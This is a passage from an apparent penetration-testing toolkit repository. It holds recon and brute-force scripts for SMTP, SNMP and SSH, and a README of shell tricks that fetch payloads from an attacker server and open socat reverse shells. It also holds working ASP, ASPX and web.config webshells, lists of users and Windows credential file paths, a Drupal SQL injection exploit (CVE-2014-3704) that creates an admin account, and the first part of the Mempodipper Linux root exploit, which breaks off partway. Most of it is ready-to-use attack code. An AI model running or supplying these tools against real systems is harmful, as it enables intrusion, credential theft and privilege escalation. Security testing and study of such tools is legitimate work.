250 | $response .= $buffer;
251 | alarm 0;
252 | };
253 |
254 | # if ($@) {
255 | # $timed_out = 1;
256 | # print "[Child $$] Timeout for username $username on host $host\n" if $debug;
257 | # }
258 |
259 | my $trace;
260 | if ($debug) {
261 | $trace = "[Child $$] $host: $username ";
262 | } else {
263 | $trace = "$host: $username ";
264 | }
265 |
266 | if ($response and not $timed_out) {
267 |
268 | # Negative result
269 | if ($response =~ /5\d\d \S+/s) {
270 | print $parent $trace . "\n";
271 | next;
272 |
273 | # Postive result
274 | } elsif ($response =~ /2\d\d \S+/s) {
275 | print $parent $trace . "exists\n";
276 | next;
277 |
278 | # Unknown response
279 | } else {
280 | $response =~ s/[\n\r]/./g;
281 | print $parent $trace . "$response\n";
282 | next;
283 | }
284 | }
285 |
286 | if ($timed_out) {
287 | print $parent $trace . "\n";
288 | } else {
289 | if (!$response) {
290 | print $parent $trace . "\n";
291 | }
292 | }
293 | }
294 | exit;
295 | }
296 | }
297 |
298 | # Fork once more to make a process that will us usernames and hosts
299 | socketpair(my $get_next_query, my $parent, AF_UNIX, SOCK_STREAM, PF_UNSPEC) or die "socketpair: $!";
300 | $get_next_query->autoflush(1);
301 | $parent->autoflush(1);
302 |
303 | # Parent executes this
304 | if (my $pid = fork) {
305 | close $parent;
306 |
307 | # Chile executes this
308 | } else {
309 | # Generate queries from username-host pairs and send to parent
310 | foreach my $username (@usernames) {
311 | foreach my $host (@hosts) {
312 | my $query = $host . "\t" . $username . "\t" . $domain;
313 | print "[Query Generator] Sending $query to parent\n" if $debug;
314 | print $parent "$query\n";
315 | }
316 | }
317 |
318 | exit 0;
319 | }
320 |
321 | printf "Created %d child processes\n", scalar(@child_handles) if $debug;
322 | my $s = IO::Select->new();
323 | my $s_in = IO::Select->new();
324 | $s->add(@child_handles);
325 | $s_in->add(\*STDIN);
326 | my $timeout = 0; # non-blocking
327 | my $more_queries = 1;
328 | my $outstanding_queries = 0;
329 | my $query_count = 0;
330 | my $result_count = 0;
331 |
332 | # Write to each child process once
333 | writeloop: foreach my $write_handle (@child_handles) {
334 | my $query = <$get_next_query>;
335 | if ($query) {
336 | chomp($query);
337 | print "[Parent] Sending $query to child\n" if $debug;
338 | print $write_handle "$query\n";
339 | $outstanding_queries++;
340 | } else {
341 | print "[Parent] Quitting main loop. All queries have been read.\n" if $debug;
342 | last writeloop;
343 | }
344 | }
345 |
346 | # Keep reading from child processes until there are no more queries left
347 | # Write to a child only after it has been read from
348 | mainloop: while (1) {
349 | # Wait until there's a child that we can either read from or written to.
350 | my ($rh_aref) = IO::Select->select($s, undef, undef); # blocking
351 |
352 | print "[Parent] There are " . scalar(@$rh_aref) . " children that can be read from\n" if $debug;
353 |
354 | foreach my $read_handle (@$rh_aref) {
355 | # Read from child
356 | chomp(my $line = <$read_handle>);
357 | if ($verbose == 1 or $debug == 1 or not ($line =~ // or $line =~ /no result/ or $line =~ //)) {
358 | print "$line\n";
359 | $result_count++ unless ($line =~ // or $line =~ /no result/ or $line =~ //);
360 | }
361 | $outstanding_queries--;
362 | $query_count++;
363 |
364 | # Write to child
365 | my $query = <$get_next_query>;
366 | if ($query) {
367 | chomp($query);
368 | print "[Parent] Sending $query to child\n" if $debug;
369 | print $read_handle "$query\n";
370 | $outstanding_queries++;
371 | } else {
372 | print "DEBUG: Quitting main loop. All queries have been read.\n" if $debug;
373 | last mainloop;
374 | }
375 | }
376 | }
377 |
378 | # Wait to get replies back from remaining children
379 | my $count = 0;
380 | readloop: while ($outstanding_queries) {
381 | my @ready_to_read = $s->can_read(1); # blocking
382 | foreach my $child_handle (@ready_to_read) {
383 | print "[Parent] Outstanding queries: $outstanding_queries\n" if $debug;
384 | chomp(my $line = <$child_handle>);
385 | if ($verbose == 1 or $debug == 1 or not ($line =~ // or $line =~ /no result/ or $line =~ //)) {
386 | print "$line\n";
387 | $result_count++ unless ($line =~ // or $line =~ /no result/ or $line =~ //);
388 | }
389 | print $child_handle "$kill_child_string\n";
390 | $s->remove($child_handle);
391 | $outstanding_queries--;
392 | $query_count++;
393 | }
394 | }
395 |
396 | # Tell any remaining children to exit
397 | foreach my $handle ($s->handles) {
398 | print "[Parent] Telling child to exit\n" if $debug;
399 | print $handle "$kill_child_string\n";
400 | }
401 |
402 | # Wait for all children to terminate
403 | while(wait != -1) {};
404 |
405 | print "######## Scan completed at " . scalar(localtime()) . " #########\n";
406 | print "$result_count results.\n";
407 | print "\n";
408 | $end_time = time(); # Second granularity only to avoid depending on hires time module
409 | my $run_time = $end_time - $start_time;
410 | $run_time = 1 if $run_time < 1; # Avoid divide by zero
411 | printf "%d queries in %d seconds (%0.1f queries / sec)\n", $query_count, $run_time, $query_count / $run_time;
412 |
--------------------------------------------------------------------------------
/recon_scan/smtprecon.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | import socket
3 | import sys
4 | import subprocess
5 |
6 | if len(sys.argv) != 2:
7 | print "Usage: smtprecon.py "
8 | sys.exit(0)
9 |
10 | #SMTPSCAN = "nmap -vv -sV -Pn -p 25,465,587 --script=smtp-vuln* %s" % (sys.argv[1])
11 | #results = subprocess.check_output(SMTPSCAN, shell=True)
12 |
13 | #f = open("results/smtpnmapresults.txt", "a")
14 | #f.write(results)
15 | #f.close
16 |
17 |
18 | print "INFO: Trying SMTP Enum on " + sys.argv[1]
19 | names = open('/usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/names/namelist.txt', 'r')
20 | for name in names:
21 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
22 | connect=s.connect((sys.argv[1],25))
23 | banner=s.recv(1024)
24 | s.send('HELO test@test.org \r\n')
25 | result= s.recv(1024)
26 | s.send('VRFY ' + name.strip() + '\r\n')
27 | result=s.recv(1024)
28 | if ("not implemented" in result) or ("disallowed" in result):
29 | sys.exit("INFO: VRFY Command not implemented on " + sys.argv[1])
30 | if (("250" in result) or ("252" in result) and ("Cannot VRFY" not in result)):
31 | print "[*] SMTP VRFY Account found on " + sys.argv[1] + ": " + name.strip()
32 | s.close()
33 |
34 |
--------------------------------------------------------------------------------
/recon_scan/snmprecon.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | import subprocess
3 | import sys
4 |
5 | if len(sys.argv) != 2:
6 | print "Usage: snmprecon.py "
7 | sys.exit(0)
8 |
9 | snmpdetect = 0
10 | ip_address = sys.argv[1]
11 |
12 | ONESIXONESCAN = "onesixtyone %s" % (ip_address)
13 | results = subprocess.check_output(ONESIXONESCAN, shell=True).strip()
14 |
15 | if results != "":
16 | if "Windows" in results:
17 | results = results.split("Software: ")[1]
18 | snmpdetect = 1
19 | elif "Linux" in results:
20 | results = results.split("[public] ")[1]
21 | snmpdetect = 1
22 | if snmpdetect == 1:
23 | print "[*] SNMP running on " + ip_address + "; OS Detect: " + results
24 | SNMPWALK = "snmpwalk -c public -v1 %s 1 > results/%s_snmpwalk.txt" % (ip_address, ip_address)
25 | results = subprocess.check_output(SNMPWALK, shell=True)
26 |
27 | NMAPSCAN = "nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes %s" % (ip_address)
28 | results = subprocess.check_output(NMAPSCAN, shell=True)
29 | resultsfile = "results/" + ip_address + "_snmprecon.txt"
30 | f = open(resultsfile, "w")
31 | f.write(results)
32 | f.close
33 |
34 |
--------------------------------------------------------------------------------
/recon_scan/sshrecon.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | import subprocess
3 | import sys
4 |
5 | if len(sys.argv) != 3:
6 | print "Usage: sshrecon.py "
7 | sys.exit(0)
8 |
9 | ip_address = sys.argv[1].strip()
10 | port = sys.argv[2].strip()
11 |
12 | print "INFO: Performing hydra ssh scan against " + ip_address
13 | HYDRA = "hydra -L wordlists/userlist -P wordlists/offsecpass -f -o results/%s_sshhydra.txt -u %s -s %s ssh" % (ip_address, ip_address, port)
14 | try:
15 | results = subprocess.check_output(HYDRA, shell=True)
16 | resultarr = results.split("\n")
17 | for result in resultarr:
18 | if "login:" in result:
19 | print "[*] Valid ssh credentials found: " + result
20 | except:
21 | print "INFO: No valid ssh credentials found"
22 |
--------------------------------------------------------------------------------
/useful_tricks/README.md:
--------------------------------------------------------------------------------
1 | ## Some useful tricks that could be useful to get a shell
2 |
3 | #### 1. I have a RCE on windows box and I need to get a shell... Wget with Powershell!
4 |
5 | * Obtain your payload with msfvenom or similar:
6 |
7 | ```
8 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > payload.exe
9 | ```
10 |
11 | * Execute through your RCE on windows box:
12 |
13 | ```
14 | command = "PowerShell -Command \"wget 'http://your_controlled_server/payload.exe' -OutFile reverse.exe\"" # command to run with RCE
15 | ```
16 |
17 | Execute your payload (now called "reverse.exe") using RCE and setup a listening with msf multi-handler.
18 |
19 | *Obs: Obviously, this method may not work well due to permission conditions and so on. This is out-of-scope... it's just a trick! :-)*
20 |
21 | #### 2. Use certutil.exe to download files inside a Windows machine
22 |
23 | ```
24 | certutil -urlcache -split -f http://:8080/msfpayload64.exe C:\\inetpub\\wwwroot\\msfpayload64.exe
25 | ```
26 |
27 | #### 3. Use impacket-smbserver to run payloads in a Windows target
28 |
29 | On your attacker machine, create a SMB server hosting a MSF payload (for example)
30 |
31 | ```
32 | root@kali:/tmp# impacket-smbserver share /tmp
33 | Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies
34 |
35 | [*] Config file parsed
36 | [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
37 | [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
38 | [*] Config file parsed
39 | [*] Config file parsed
40 | [*] Config file parsed
41 | ```
42 |
43 | Using your RCE in the Windows box (target), execute the payload:
44 |
45 | ```
46 | C:/>\\\msfpayload.exe
47 | ```
48 |
49 | On this way... the "msfpayload.exe" will never touch the disk.
50 |
51 | #### 4. I need to transfer files (like my payloads) between VMs/hosts
52 |
53 | * You can setup a simple web server using Python or PHP.
54 | + Python:
55 |
56 | ```python
57 | python -m SimpleHTTPServer 8080
58 | ```
59 |
60 | And a simple HTTP server will be listening on your 8080 TCP port.
61 |
62 | + PHP:
63 |
64 | ```php
65 | php -S 127.0.0.1:8080
66 | ```
67 | And a simple HTTP server will be listening on 127.0.0.1:8080.
68 |
69 | #### 5. Upgrading simple shells to TTYs (or something close to it)
70 |
71 | * Python with "pty":
72 |
73 | ```python
74 | python -c "import pty;pty.spawn('/bin/bash');"
75 | ```
76 | * Socat
77 |
78 | On your localhost (attacker):
79 |
80 | ```
81 | socat file:`tty`,raw,echo=0 tcp-listen:443
82 | ```
83 |
84 | On your victim:
85 |
86 | ```
87 | socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp::443
88 | ```
89 |
90 | ## Interesting links to read!
91 |
92 | I *REALLY* recommend this link: https://bitvijays.github.io/LFC-VulnerableMachines.html
93 | https://blog.ropnop.com/transferring-files-from-kali-to-windows/ (A lot of techniques to transfer files from attacker machine to a windows box)
94 | https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ (Upgrading simple shells techniques)
95 |
--------------------------------------------------------------------------------
/webshells/asp/list.asp:
--------------------------------------------------------------------------------
1 |
11 |
12 |
13 |
14 |
15 | <%
16 |
17 | file=request("file")
18 | tipo=request("type")
19 |
20 | If file="" then
21 | file="c:\"
22 | tipo="1"
23 | End If
24 |
25 | %>
26 |
27 |
28 |
33 |
34 |
35 | <%
36 |
37 | If tipo="1" then
38 | Response.Write("PATH: " & file & "
")
39 | ListFolder(file)
40 | End If
41 |
42 | If tipo="2" then
43 | Response.Write("FILE: " & file & "
")
44 |
45 | Set oStr = server.CreateObject("Scripting.FileSystemObject")
46 | Set oFich = oStr.OpenTextFile(file, 1)
47 |
48 | Response.Write("--
")
49 |
50 | Response.Write(oFich.ReadAll)
51 |
52 | Response.Write("
--
")
53 |
54 | End If
55 | %>
56 |
57 | <%
58 |
59 | sub ListFolder(path)
60 |
61 | set fs = CreateObject("Scripting.FileSystemObject")
62 | set folder = fs.GetFolder(path)
63 |
64 | Response.Write("
( ) " & ".." & "" & vbCrLf)
65 |
66 | for each item in folder.SubFolders
67 | Response.Write("
( ) " & item.Name & "" & vbCrLf)
68 | next
69 |
70 | for each item in folder.Files
71 | Response.Write("" & item.Name & " - " & item.Size & " bytes, " & "" & vbCrLf)
72 | next
73 |
74 | end sub
75 |
76 | %>
77 |
78 |
79 |
80 |
--------------------------------------------------------------------------------
/webshells/asp/webshell.asp:
--------------------------------------------------------------------------------
1 |
9 |
10 |
11 | <%
12 | Set oScript = Server.CreateObject("WSCRIPT.SHELL")
13 | Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
14 | Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
15 | Function getCommandOutput(theCommand)
16 | Dim objShell, objCmdExec
17 | Set objShell = CreateObject("WScript.Shell")
18 | Set objCmdExec = objshell.exec(thecommand)
19 | getCommandOutput = objCmdExec.StdOut.ReadAll
20 | end Function
21 | %>
22 |
23 |
24 |
25 |
26 |
30 |
31 | <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
32 | <%Response.Write(Request.ServerVariables("server_name"))%>
33 |
34 | The server's port:
35 | <%Response.Write(Request.ServerVariables("server_port"))%>
36 |
37 |
38 | The server's software:
39 | <%Response.Write(Request.ServerVariables("server_software"))%>
40 |
41 |
42 | The server's software:
43 | <%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
44 | <% szCMD = request("cmd")
45 | thisDir = getCommandOutput("cmd /c" & szCMD)
46 | Response.Write(thisDir)%>
47 |
48 |
49 |
50 |
51 |
--------------------------------------------------------------------------------
/webshells/asp/webshell.aspx:
--------------------------------------------------------------------------------
1 | <%@ Page Language="C#" %>
2 | <%@ Import namespace="System.Diagnostics"%>
3 | <%@ Import Namespace="System.IO" %>
4 |
5 |
6 |
7 |
70 |
71 |
72 |
73 | Command
74 |
75 |
76 |
93 |
94 |
95 |
96 |
97 |
--------------------------------------------------------------------------------
/webshells/coldfusion/README.md:
--------------------------------------------------------------------------------
1 | 1. Access "Debugging and Logging">"Scheduled Tasks". (Coldfusion 6-10)
2 | 2. In URL, put the address of your web server hosting the webshell: http://172.20.1.27:8080/cmd.cfml
3 | 3. In "File" field: C:\Inetpub\wwwroot\cmd.cfml
4 | 4. Execute the task.
5 |
6 | Access http://target.com/cmd.cfml
7 |
--------------------------------------------------------------------------------
/webshells/coldfusion/cmd.cfml:
--------------------------------------------------------------------------------
1 |
2 |
18 |
19 |
20 |
25 |
26 |
27 |
31 |
32 |
35 |
36 |
37 |
38 |
39 |
--------------------------------------------------------------------------------
/webshells/php/cmd.php:
--------------------------------------------------------------------------------
1 |
6 |
--------------------------------------------------------------------------------
/webshells/web.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 | <%
21 | Set oScript = Server.CreateObject("WSCRIPT.SHELL")
22 | Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
23 | Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
24 |
25 | szCMD = request("cmd")
26 |
27 | If (szCMD <> "") Then
28 | szTempFile = "c:\inetpub\wwwroot\uploadedfiles\" & oFileSys.GetTempName( )
29 | Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
30 | Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
31 | End If
32 | %>
33 |
34 |
35 |
36 |
40 |
41 | <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
42 |
43 | <%
44 | If (IsObject(oFile)) Then
45 | On Error Resume Next
46 | Response.Write Server.HTMLEncode(oFile.ReadAll)
47 | oFile.Close
48 | Call oFileSys.DeleteFile(szTempFile, True)
49 | End If
50 | %>
51 |
52 |
53 |
--------------------------------------------------------------------------------
/wordlists/README.md:
--------------------------------------------------------------------------------
1 | For passwords: /usr/share/wordlists/rockyou.txt
2 |
--------------------------------------------------------------------------------
/wordlists/unix_users.txt:
--------------------------------------------------------------------------------
1 |
2 | 4Dgifts
3 | EZsetup
4 | OutOfBox
5 | ROOT
6 | adm
7 | admin
8 | administrator
9 | anon
10 | auditor
11 | avahi
12 | avahi-autoipd
13 | backup
14 | bbs
15 | bin
16 | checkfs
17 | checkfsys
18 | checksys
19 | cmwlogin
20 | couchdb
21 | daemon
22 | dbadmin
23 | demo
24 | demos
25 | diag
26 | distccd
27 | dni
28 | fal
29 | fax
30 | ftp
31 | games
32 | gdm
33 | gnats
34 | gopher
35 | gropher
36 | guest
37 | haldaemon
38 | halt
39 | hplip
40 | informix
41 | install
42 | irc
43 | karaf
44 | kernoops
45 | libuuid
46 | list
47 | listen
48 | lp
49 | lpadm
50 | lpadmin
51 | lynx
52 | mail
53 | man
54 | me
55 | messagebus
56 | mountfs
57 | mountfsys
58 | mountsys
59 | news
60 | noaccess
61 | nobody
62 | nobody4
63 | nuucp
64 | nxpgsql
65 | operator
66 | oracle
67 | pi
68 | popr
69 | postgres
70 | postmaster
71 | printer
72 | proxy
73 | pulse
74 | rfindd
75 | rje
76 | root
77 | rooty
78 | saned
79 | service
80 | setup
81 | sgiweb
82 | sigver
83 | speech-dispatcher
84 | sshd
85 | sym
86 | symop
87 | sync
88 | sys
89 | sysadm
90 | sysadmin
91 | sysbin
92 | syslog
93 | system_admin
94 | trouble
95 | udadmin
96 | ultra
97 | umountfs
98 | umountfsys
99 | umountsys
100 | unix
101 | us_admin
102 | user
103 | uucp
104 | uucpadm
105 | web
106 | webmaster
107 | www
108 | www-data
109 | xpdb
110 | xpopr
111 | zabbix
112 | vagrant
113 |
--------------------------------------------------------------------------------
/wordlists/windows_interesting_files:
--------------------------------------------------------------------------------
1 | C:\Users\Administrator\NTUser.dat
2 | C:\Documents and Settings\Administrator\NTUser.dat
3 | C:\apache\logs\access.log
4 | C:\apache\logs\error.log
5 | C:\apache\php\php.ini
6 | C:\boot.ini
7 | C:\inetpub\wwwroot\global.asa
8 | C:\MySQL\data\hostname.err
9 | C:\MySQL\data\mysql.err
10 | C:\MySQL\data\mysql.log
11 | C:\MySQL\my.cnf
12 | C:\MySQL\my.ini
13 | C:\php4\php.ini
14 | C:\php5\php.ini
15 | C:\php\php.ini
16 | C:\Program Files\Apache Group\Apache2\conf\httpd.conf
17 | C:\Program Files\Apache Group\Apache\conf\httpd.conf
18 | C:\Program Files\Apache Group\Apache\logs\access.log
19 | C:\Program Files\Apache Group\Apache\logs\error.log
20 | C:\Program Files\FileZilla Server\FileZilla Server.xml
21 | C:\Program Files\MySQL\data\hostname.err
22 | C:\Program Files\MySQL\data\mysql-bin.log
23 | C:\Program Files\MySQL\data\mysql.err
24 | C:\Program Files\MySQL\data\mysql.log
25 | C:\Program Files\MySQL\my.ini
26 | C:\Program Files\MySQL\my.cnf
27 | C:\Program Files\MySQL\MySQL Server 5.0\data\hostname.err
28 | C:\Program Files\MySQL\MySQL Server 5.0\data\mysql-bin.log
29 | C:\Program Files\MySQL\MySQL Server 5.0\data\mysql.err
30 | C:\Program Files\MySQL\MySQL Server 5.0\data\mysql.log
31 | C:\Program Files\MySQL\MySQL Server 5.0\my.cnf
32 | C:\Program Files\MySQL\MySQL Server 5.0\my.ini
33 | C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf
34 | C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf
35 | C:\Program Files (x86)\Apache Group\Apache\conf\access.log
36 | C:\Program Files (x86)\Apache Group\Apache\conf\error.log
37 | C:\Program Files (x86)\FileZilla Server\FileZilla Server.xml
38 | C:\Program Files (x86)\xampp\apache\conf\httpd.conf
39 | C:\WINDOWS\php.ini
40 | C:\WINDOWS\Repair\SAM
41 | C:\Windows\repair\system
42 | C:\Windows\repair\software
43 | C:\Windows\repair\security
44 | C:\WINDOWS\System32\drivers\etc\hosts
45 | C:\Windows\win.ini
46 | C:\WINNT\php.ini
47 | C:\WINNT\win.ini
48 | C:\xampp\apache\bin\php.ini
49 | C:\xampp\apache\logs\access.log
50 | C:\xampp\apache\logs\error.log
51 | C:\Windows\Panther\Unattend\Unattended.xml
52 | C:\Windows\Panther\Unattended.xml
53 | C:\Windows\debug\NetSetup.log
54 | C:\Windows\system32\config\AppEvent.Evt
55 | C:\Windows\system32\config\SecEvent.Evt
56 | C:\Windows\system32\config\default.sav
57 | C:\Windows\system32\config\security.sav
58 | C:\Windows\system32\config\software.sav
59 | C:\Windows\system32\config\system.sav
60 | C:\Windows\system32\config\regback\default
61 | C:\Windows\system32\config\regback\sam
62 | C:\Windows\system32\config\regback\security
63 | C:\Windows\system32\config\regback\system
64 | C:\Windows\system32\config\regback\software
65 | C:\Program Files\MySQL\MySQL Server 5.1\my.ini
66 | C:\Windows\System32\inetsrv\config\schema\ASPNET_schema.xml
67 | C:\Windows\System32\inetsrv\config\applicationHost.config
68 | C:\inetpub\logs\LogFiles\W3SVC1\u_ex[YYMMDD].log
69 |
--------------------------------------------------------------------------------
/xpl/drupal_prior_7.32.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # drupalSQLi.py -- a simple PoC for the Drupal SQLi vuln (CVE-2014-3704)
3 | # Author: Mike Czumak (T_v3rn1x) - @SecuritySift
4 | # You are free to share and/or reuse all or portions of this code as long as it's not for commercial purposes
5 | # Absolutely no warranty or promises of reliability, accuracy, or performance. Use at your own risk
6 |
7 | import sys
8 | import socket
9 | import urllib, urllib2
10 | import argparse
11 | import urlparse
12 |
13 | class print_colors:
14 | SUCCESS = '\033[92m'
15 | ERROR = '\033[91m'
16 | END = '\033[0m'
17 |
18 |
19 | #################################################
20 | ############### Args/Usage ###############
21 | #################################################
22 |
23 | def get_args():
24 |
25 | parser = argparse.ArgumentParser( prog="drupalSQLi.py",
26 | formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
27 | epilog= '''
28 | This script will exploit the Drupal SQL injection vulnerability (CVE-2014-3704)
29 | by adding a new user with admin privileges. Password will be `pwnd`.''')
30 |
31 | parser.add_argument("target", help="URL of target Drupal site")
32 | parser.add_argument("name", help="Username to Add")
33 | parser.add_argument("-u", "--uid", default="99999", help="User Id for new user (default = 99999)")
34 | parser.add_argument("-r", "--rid", default="3", help="rid for admin user (default = 3)")
35 |
36 | args = parser.parse_args()
37 |
38 | return args
39 |
40 | #################################################
41 | ############### Print Function ###############
42 | #################################################
43 |
44 | ''' universal print function with formatting '''
45 | def print_msg (msgtype, msgcontent):
46 | endcolor = print_colors.END
47 |
48 | if msgtype == "error":
49 | startcolor = print_colors.ERROR
50 | print("%s[!] ERROR: %s%s" % (startcolor, msgcontent, endcolor))
51 |
52 | elif msgtype == "success":
53 | startcolor = print_colors.SUCCESS
54 | print("%s[*] SUCCESS: %s%s" % (startcolor, msgcontent, endcolor))
55 |
56 | else:
57 | print("%s" % (msgcontent))
58 |
59 | #################################################
60 | ############ EXPLOIT #############
61 | #################################################
62 |
63 | ''' SQL Injection Exploit to Add Admin User '''
64 |
65 | def pwn_target(target, uname, uid, rid):
66 | target = target + "?destination=node"
67 | pass_hash = urllib.quote_plus("$S$DIkdNZqdxqh7Tmufxs8l1vAu0wdzxF//smWKAcjCv45KWjK0YFBg") # pass = pwnd
68 | create_user = "name[0;insert%20into%20users%20values%20("+uid+",'"+uname+"','"+pass_hash+"','pwnd@pwnd.pwn','','',NULL,0,0,0,1,NULL,'',0,'',NULL);#%20%20]=test&name[0]=test&pass=test&form_id=user_login_block&op=Log+in";
69 | grant_privs = "name[0;insert%20into%20users_roles%20values%20("+uid+","+rid+");#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
70 |
71 | try:
72 | req = urllib2.Request(target, create_user)
73 | res = urllib2.urlopen(req).read()
74 | req = urllib2.Request(target, grant_privs)
75 | res = urllib2.urlopen(req).read()
76 | print_msg("success", ("Admin user '%s' should now be added with password 'pwnd' and uid of %s\nNavigate to %s and login with these credentials" % (uname, uid, target)))
77 |
78 | except:
79 | print_msg("error", ( "[%s] %s%s" % (str(target), str(sys.exc_info()[0]), str(sys.exc_info()[1]))))
80 |
81 |
82 | #################################################
83 | ############### Main ###############
84 | #################################################
85 |
86 | def main():
87 | print
88 | print '============================================================================='
89 | print '| DRUPAL SQL INJECTIION DEMO (CVE-2014-3704) |'
90 | print '| Author: Mike Czumak (T_v3rn1x) - @SecuritySift |'
91 | print '=============================================================================\n'
92 |
93 | args = get_args() # get the cl args
94 | pwn_target(args.target.strip(), args.name.strip(), args.uid.strip(), args.rid.strip())
95 |
96 |
97 | if __name__ == '__main__':
98 | main()
99 |
--------------------------------------------------------------------------------
/xpl/mempodipper.c:
--------------------------------------------------------------------------------
1 | /*
2 | * Mempodipper
3 | * by zx2c4
4 | *
5 | * Linux Local Root Exploit
6 | *
7 | * Rather than put my write up here, per usual, this time I've put it
8 | * in a rather lengthy blog post: http://blog.zx2c4.com/749
9 | *
10 | * Enjoy.
11 | *
12 | * - zx2c4
13 | * Jan 21, 2012
14 | *
15 | * CVE-2012-0056
16 | */
17 |
18 | #define _LARGEFILE64_SOURCE
19 | #define _GNU_SOURCE
20 | #include
21 | #include
22 | #include
23 | #include
24 | #include
25 | #include
26 | #include
27 | #include
28 | #include
29 | #include
30 | #include
31 | #include
32 | #include
33 | #include
34 | #include
35 |
36 | char *prog_name;
37 | const char *exploit_prog_path = "/bin/su";
38 | const char *exploit_prog_name = "su";
39 |
40 | int send_fd(int sock, int fd)
41 | {
42 | char buf[1];
43 | struct iovec iov;
44 | struct msghdr msg;
45 | struct cmsghdr *cmsg;
46 | int n;
47 | char cms[CMSG_SPACE(sizeof(int))];
48 |
49 | buf[0] = 0;
50 | iov.iov_base = buf;
51 | iov.iov_len = 1;
52 |
53 | memset(&msg, 0, sizeof msg);
54 | msg.msg_iov = &iov;
55 | msg.msg_iovlen = 1;
56 | msg.msg_control = (caddr_t)cms;
57 | msg.msg_controllen = CMSG_LEN(sizeof(int));
58 |
59 | cmsg = CMSG_FIRSTHDR(&msg);
60 | cmsg->cmsg_len = CMSG_LEN(sizeof(int));
61 | cmsg->cmsg_level = SOL_SOCKET;
62 | cmsg->cmsg_type = SCM_RIGHTS;
63 | memmove(CMSG_DATA(cmsg), &fd, sizeof(int));
64 |
65 | if ((n = sendmsg(sock, &msg, 0)) != iov.iov_len)
66 | return -1;
67 | close(sock);
68 | return 0;
69 | }
70 |
71 | int recv_fd(int sock)
72 | {
73 | int n;
74 | int fd;
75 | char buf[1];
76 | struct iovec iov;
77 | struct msghdr msg;
78 | struct cmsghdr *cmsg;
79 | char cms[CMSG_SPACE(sizeof(int))];
80 |
81 | iov.iov_base = buf;
82 | iov.iov_len = 1;
83 |
84 | memset(&msg, 0, sizeof msg);
85 | msg.msg_name = 0;
86 | msg.msg_namelen = 0;
87 | msg.msg_iov = &iov;
88 | msg.msg_iovlen = 1;
89 |
90 | msg.msg_control = (caddr_t)cms;
91 | msg.msg_controllen = sizeof cms;
92 |
93 | if ((n = recvmsg(sock, &msg, 0)) < 0)
94 | return -1;
95 | if (n == 0)
96 | return -1;
97 | cmsg = CMSG_FIRSTHDR(&msg);
98 | memmove(&fd, CMSG_DATA(cmsg), sizeof(int));
99 | close(sock);
100 | return fd;
101 | }
102 |
103 | unsigned long ptrace_address()
104 | {
105 | int fd[2];
106 | printf("[+] Creating ptrace pipe.\n");
107 | pipe2(fd, O_NONBLOCK);
108 | printf("[+] Forking ptrace child.\n");
109 | int child = fork();
110 | if (child) {
111 | close(fd[1]);
112 | char buf;
113 | printf("[+] Waiting for ptraced child to give output on syscalls.\n");
114 | for (;;) {
115 | wait(NULL);
116 | if (read(fd[0], &buf, 1) > 0)
117 | break;
118 | ptrace(PTRACE_SYSCALL, child, NULL, NULL);
119 | }
120 |
121 | printf("[+] Error message written. Single stepping to find address.\n");
122 | struct user_regs_struct regs;
123 | for (;;) {
124 | ptrace(PTRACE_SINGLESTEP, child, NULL, NULL);
125 | wait(NULL);
126 | ptrace(PTRACE_GETREGS, child, NULL, ®s);
127 | #if defined(__i386__)
128 | #define instruction_pointer regs.eip
129 | #define upper_bound 0xb0000000
130 | #elif defined(__x86_64__)
131 | #define instruction_pointer regs.rip
132 | #define upper_bound 0x700000000000
133 | #else
134 | #error "That platform is not supported."
135 | #endif
136 | if (instruction_pointer < upper_bound) {
137 | unsigned long instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL);
138 | if ((instruction & 0xffff) == 0x25ff /* jmp r/m32 */)
139 | return instruction_pointer;
140 | }
141 | }
142 | } else {
143 | printf("[+] Ptrace_traceme'ing process.\n");
144 | if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) < 0) {
145 | perror("[-] ptrace");
146 | return 0;
147 | }
148 | close(fd[0]);
149 | dup2(fd[1], 2);
150 | execl(exploit_prog_path, exploit_prog_name, "not-a-valid-entry", NULL);
151 | }
152 | return 0;
153 | }
154 |
155 | unsigned long objdump_address()
156 | {
157 | char cmdbuf[256];
158 | snprintf(cmdbuf, sizeof(cmdbuf), "objdump -d %s|grep ''|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\\([^0]*\\)/0x\\1/'", exploit_prog_path);
159 | FILE *command = popen(cmdbuf, "r");
160 | if (!command) {
161 | perror("[-] popen");
162 | return 0;
163 | }
164 | char result[32];
165 | fgets(result, 32, command);
166 | pclose(command);
167 | return strtoul(result, NULL, 16);
168 | }
169 |
170 | unsigned long find_address()
171 | {
172 | printf("[+] Ptracing %s to find next instruction without reading binary.\n", exploit_prog_name);
173 | unsigned long address = ptrace_address();
